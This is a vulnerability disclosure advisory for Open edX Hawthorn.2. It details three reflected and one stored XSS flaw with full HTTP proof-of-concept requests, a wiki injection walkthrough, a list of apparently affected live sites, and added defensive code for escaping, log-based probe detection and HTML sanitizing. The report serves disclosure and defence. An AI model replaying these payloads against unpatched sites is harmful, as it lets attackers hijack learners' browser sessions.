ITAS SECURITY TEAM DISCOVERS MULTIPLE SECURITY VULNERABILITIES IN THE OPEN EDX ONLINE LEARNING PLATFORM

Open edX (https://github.com/edx/edx-platform) is an online learning platform developed by Harvard and MIT since 2012. Open edX is used by many international organizations such as Microsoft, IBM, Harvard University, MIT, Stanford University and other organizations around the world. During a security assessment for a customer running Open edX, ITAS SECURITY TEAM discovered several security vulnerabilities in the Open edX source code (Hawthorn.2 release, 06/29/2018). The vulnerabilities include Stored Cross Site Scripting (Stored XSS) and Reflected Cross Site Scripting (Reflected XSS). An attacker can abuse these vulnerabilities to attack users of an Open edX system.

ITAS Security Team reported these issues to the vendor so they could be fixed. The Open edX team replied to ITAS Team by email as follows:

“After ITAS Security Team notified edX of the security vulnerabilities, edX reviewed and confirmed a total of 4 CAT-1 security issues. ITAS Team continued to assist with a second round of verification of the remaining issues. To express their appreciation, edX awarded ITAS Team a bounty of $600 USD. From edX's reply to ITAS: “Thank you so much for working hard to make edx.org safer for millions of learners worldwide. As a non-profit open source company, we really appreciate you taking the time to find and disclose these issues to us directly.”

Cross Site Scripting, also known as XSS, is number 7 in the OWASP Top 10 2017 (https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)). Through an XSS vulnerability an attacker injects malicious code into the application's pages, and from there can steal sessions, interact with the user's browser, and build further attacks against end users.

During our survey, we found that online learning systems running the vulnerable version are all at risk of attack and exploitation, for example the following sites:

  • https://courses.edx.org
  • https://openedx.microsoft.com
  • https://openedx.gse.harvard.edu
  • https://lagunita.stanford.edu
  • https://lms.mitx.mit.edu
  • https://university.redislab.com
  • https://openedx.open.ac.uk/
  • https://campus.gov.il
  • https://demo.edunext.io/

1. Application Information

Vendor : https://open.edx.org/
Download link: https://github.com/edx/edx-platform
Vulnerable version: Hawthorn.2
Fixed version: Ironwood.3
Release date: 2019-02-27

2. Vulnerability Information

a. Template – URL Cross Site Scripting

Vulnerability name : Reflected Cross Site Scripting
Demonstration site: https://openedx.microsoft.com/template
Affected URL : https://openedx.microsoft.com/template/{PAYLOAD}
Payload: <script>alert("XSS")</script>
Parameter type: GET
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /template/<script>alert('XSS')</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:03:38 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 46
Connection: Close

Missing template <script>alert('XSS')</script>


b. Xblock – Reflected Cross Site Scripting

Vulnerability name : Reflected Cross Site Scripting
Demonstration site: https://courses.edx.org
Affected URL : https://courses.edx.org/xblock/{usage_id}?view={PAYLOAD}
Payload: <script>alert("XSS")</script>
Parameter name: view
Parameter type: GET
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /xblock/block-v1:edX+DemoX+Demo_Course+type@vertical+block@vertical?view=<script>alert("XSS")</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:15:49 GMT
Server: nginx
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A9FFA4D0509C04A79307C543BC7A564BF3102652C9DDBF45788A0111B01830935A583EAE591F65FD084E6693F1009EDC31;PATH=/;MAX-AGE=120
Vary: Accept-Language, Cookie
Content-Length: 78
Connection: Close

Rendering of the xblock view '<script>alert('XSS')</script>' is not supported.


c. Certificate – Reflected Cross Site Scripting

Vulnerability name: Reflected Cross-site Scripting
Affected URL: http://localhost/certificates/search/?user={PAYLOAD}
Sample attack pattern: <script>alert('XSS')</script>
Parameter name: user
Parameter Type: GET
Github link: https://github.com/edx/edx-platform/blob/master/lms/djangoapps/certificates/views/support.py
Vulnerable function: search_certificates(request), line 91
Condition to attack: Required staff role or higher
Fixed link: https://github.com/edx/edx-platform/pull/19519

Proof of concept

Request

GET /certificates/search/?user=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [session cookies of the staff test account redacted]
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 17 Dec 2018 09:34:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51
Connection: close
Vary: Accept-Language, Cookie
X-Frame-Options: ALLOW
Content-Language: en
Set-Cookie: openedx-language-preference=en; expires=Mon, 31-Dec-2018 09:34:29 GMT; Max-Age=1209600; Path=/

user '<script>alert('XSS')</script>' does not exist
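As an added example (not edx-platform's own code), the unescaped message pattern visible in the certificate search response beside its escaped form, plus a defender-side check that flags requests to the three reflected endpoints above when the echoed value carries markup. The endpoint-to-parameter map, the helper names and the log lines are assumptions constructed for this illustration.

```python
# Added example (not edx-platform code): unescaped vs escaped error message, plus a log check.
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

USER_NOT_FOUND = "user '{user}' does not exist"   # wording from the PoC response

def error_message_vulnerable(user_filter):
    """Interpolates the raw request value into an HTML error page (the bug)."""
    return USER_NOT_FOUND.format(user=user_filter)

def error_message_fixed(user_filter):
    """Same message, but the attacker-controlled value is HTML-escaped first."""
    return USER_NOT_FOUND.format(user=html.escape(user_filter, quote=True))

# Where each reflected endpoint in the advisory echoed its input (assumed map).
REFLECTED_PATH_PREFIX = "/template/"            # section a: path segment echoed
REFLECTED_QUERY_PARAMS = {                      # sections b and c: query value echoed
    "/xblock/": "view",
    "/certificates/search/": "user",
}
MARKUP = re.compile(r"[<>]|javascript:", re.IGNORECASE)
LOG_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/1\.[01]"')

def reflected_value(request_target):
    """Return the user-controlled value a vulnerable view would echo, or None."""
    parts = urlsplit(request_target)
    path = unquote_plus(parts.path)
    if path.startswith(REFLECTED_PATH_PREFIX):
        return path[len(REFLECTED_PATH_PREFIX):]
    for prefix, param in REFLECTED_QUERY_PARAMS.items():
        if path.startswith(prefix):
            values = parse_qs(parts.query).get(param)
            return values[0] if values else None
    return None

def is_xss_probe(request_target):
    """True when the echoed value carries markup, i.e. the reflection is being tested."""
    value = reflected_value(request_target)
    return value is not None and MARKUP.search(value) is not None

def flag_probes(access_log_lines):
    """Yield request targets from nginx-style log lines that look like XSS probes."""
    for line in access_log_lines:
        m = LOG_LINE.search(line)
        if m and is_xss_probe(m.group(1)):
            yield m.group(1)

# Constructed sample log lines (not from the advisory): one benign, two probes.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Dec/2018:09:34:29 +0000] "GET /certificates/search/?user=alice HTTP/1.1" 200 512',
    '10.0.0.5 - - [17/Dec/2018:09:34:30 +0000] "GET /certificates/search/?user=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 400 51',
    '10.0.0.6 - - [17/Dec/2018:09:03:38 +0000] "GET /template/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 46',
]
```

`list(flag_probes(SAMPLE_LOG))` returns the two probing request targets and skips the benign lookup.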


d. Wiki – Stored Cross Site Scripting

Vulnerability name: Stored Cross-site Scripting
Affected URL : https://courses.edx.org/courses/{Course_id}/course_wiki
Sample attack pattern : <script>alert('XSS')</script>
Parameter name : content
Parameter Type : POST
Steps to reproduce : Log in as a student user and follow the steps below

Step 1: Access the course wiki by appending course_wiki to the course URL (whether or not the course has a wiki, e.g. https://courses.edx.org/courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki)

Step 2: Click the Edit button, put the XSS payload (<script>alert('XSS')</script>) into the wiki content, then save it.

Step 3: The payload fires on https://courses.edx.org/wiki/{Course-id}/ (e.g. https://courses.edx.org/wiki/course-v1:AdelaideX+ProgramX+3T2018/)

Proof of concept

Request 1

GET /courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: [session cookies of the student test account redacted]
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 302 Found
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:03 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:03 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Request 2

POST /wiki/AdelaideX.Code101x.3T2015/_edit/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
Content-Type: multipart/form-data; boundary=---------------------------112257516914770264881620708143
Content-Length: 954
DNT: 1
Connection: close
Cookie: [session cookies of the student test account redacted]
Upgrade-Insecure-Requests: 1

-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="csrfmiddlewaretoken"

CK0hVpI1d4KR43siLr4ssdOe8sKg1y6GZWRyn9yCGb5OHWH37OgKErgfP5jsUJrL
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="title"

Programming for Data Science
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="content"

This is the wiki for **AdelaideX**'s _Programming for Data Science_.
<script>alert('XSS')</script>
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="summary"

-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="current_revision"

89992
-----------------------------112257516914770264881620708143
Content-Disposition: form-data; name="save"

1
-----------------------------112257516914770264881620708143--

Response 2

HTTP/1.1 302 Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:45 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:45 GMT; Max-Age=1209600; Path=/
Set-Cookie: prod-edx-sessionid="1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|EPbOgM6D4T9p|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1dN:kxL_2U1JA0cAvinLbyXEfZppkvY"; Domain=.edx.org; expires=Sun, 06-Jan-2019 16:08:45 GMT; httponly; Max-Age=2419200; Path=/; secure
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Request 3

GET /wiki/AdelaideX.Code101x.3T2015/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
DNT: 1
Connection: close
Cookie: [session cookies of the student test account redacted]
Upgrade-Insecure-Requests: 1

Response 3

HTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Dec 2018 11:23:58 GMT
P3P: CP="edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy"
Server: nginx
Set-Cookie: csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; expires=Tue, 10-Dec-2019 11:23:58 GMT; Max-Age=31449600; Path=/; secure
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Tue, 25-Dec-2018 11:23:58 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A90749CECFD3E3A420861CE2F36D6BE86B832CBCF80A5BC96B29B65129A6F54A14F6993CFC88318D16B35C6A99B60FC936;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 37551
Connection: Close

.......... SNIPPET ..........
<div class="wiki-article">
<p>This is the wiki for <strong>AdelaideX</strong>'s <em>Programming for Data Science</em>.
<script>alert('XSS')</script></p>
</div>
.......... SNIPPET ..........
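The stored case above is fixed on the rendering side: whatever the wiki stores, the HTML it emits must pass through an allowlist before reaching the browser. As an added example (not django-wiki's or edx-platform's code), a small allowlist sanitizer using only the Python standard library, run over the article body from Response 3; the tag and attribute allowlists are assumptions chosen for this illustration.

```python
# Added example (not django-wiki/edx-platform code): allowlist sanitizer for rendered wiki HTML.
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "strong", "em", "ul", "ol", "li", "a", "code", "pre", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF_PREFIXES = ("http://", "https://", "/")   # rejects javascript: and data: URLs

class AllowlistSanitizer(HTMLParser):
    """Re-emits only allowlisted tags and attributes; everything else is dropped,
    including the text inside dropped <script>/<style> elements."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside a script/style element

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_PREFIXES):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

def sanitize(rendered_html):
    """Return rendered_html with non-allowlisted markup removed."""
    parser = AllowlistSanitizer()
    parser.feed(rendered_html)
    parser.close()
    return "".join(parser.out)

# The article body from the PoC response, as the wiki rendered it before sanitizing.
WIKI_HTML = ('<p>This is the wiki for <strong>AdelaideX</strong>\'s '
             '<em>Programming for Data Science</em>.\n<script>alert(\'XSS\')</script></p>')
```

`sanitize(WIKI_HTML)` keeps the paragraph, bold and italic markup and drops the injected script element together with its body.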


Disclaimer
The author is not responsible for any misuse of the information above and bears no responsibility for any damage caused by the use or misuse of these instructions. The author strictly prohibits any use of the above security issues to exploit and cause damage to the organizations listed above or any other organization.

Disclosure Timeline
+ 26/11/2018: vulnerabilities discovered
+ 26/12/2018: details sent to the application developer
+ 18/4/2019: public disclosure
